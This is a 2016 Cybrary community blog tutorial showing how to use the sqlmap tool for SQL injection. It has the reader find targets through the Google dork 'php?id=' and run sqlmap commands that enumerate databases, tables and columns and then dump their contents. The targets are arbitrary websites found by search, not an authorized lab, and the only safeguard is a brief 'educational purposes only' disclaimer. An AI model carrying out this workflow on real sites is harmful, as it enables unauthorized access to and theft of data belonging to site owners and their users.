0P3N Blog Blog Post
Ready to Start Your Career?
Create Free Account
By: tyga-tyga
June 13, 2016

SQL Injection Using SQLmap - [PART 1]

By: tyga-tyga
June 13, 2016
By: tyga-tyga
June 13, 2016
SQL Injection Using SQLmap - [PART 1] - CybrarySQL, Structured Query Language, is a programming language that allows the user to manage data in a relational database management system (RDBMS) through the use of specially crafted strings. Although great for functionality, it can be disastrous if configured/crafted incorrectly. We can exploit this using the pentesting tool SQLmap.SQLmap is a penetration testing tool that automates the process of exploiting SQL injection flaws and SQL database takeover. More information on SQLmap can be found using Google, or the option -h. Requirements:-Basic understanding of SQL-SQLmap-Common SenseThis is for educational and research purposes only! Do not attempt to violate the law with anything contained here.  Step 1: Identifying the TargetTo find a possibly vulnerable site, we'll Google dork search the term: "php?id=". A dork is an advance search using Google parameters such as "", site:, and filetype:A potentially vulnerable site looks something like this: https://mytarget.com/info.php?id=1 Step 2: Database EnumerationNow that we found a target, let's identify the databases.
sqlmap -u $url --batch --dbs
where $url is the target url.sqlmap1sqlmap2 We have the database names; let's use this information to get the tables.
sqlmap -u $url --batch --table -D $databasename
Where $url is the Victim URL and $databasename is the name of the database.sqlmap3sqlmap4 With that information, we can discover the columns.
sqlmap -u $url --columns -D $databasename -T $tablename
Where $url is the Victim URL, $databasename is the name of the database, and $tablename is the name of the table.sqlmap5sqlmap6 Step 3: The DumpNow that we've found our target, let's dump what we have.
sqlmap -u $url --dump -D $databasename -T $tablename
And, we'll get something like this:sqlmap7sqlmap8 That's it! I'll be posting again, so stay tuned!Bonus: Here's a list of other popular Google dork queries.

Do you like to write about your infosec knowledge, skills, opinions, or exploits?

Blog Icon

Publish your original research, tutorials, articles, or other written content on Cybray's blog to be seen by thousands of infosec readers daily!

Build your Cybersecurity or IT Career

Accelerate in your role, earn new certifications, and develop cutting-edge skills using the fastest growing catalog in the industry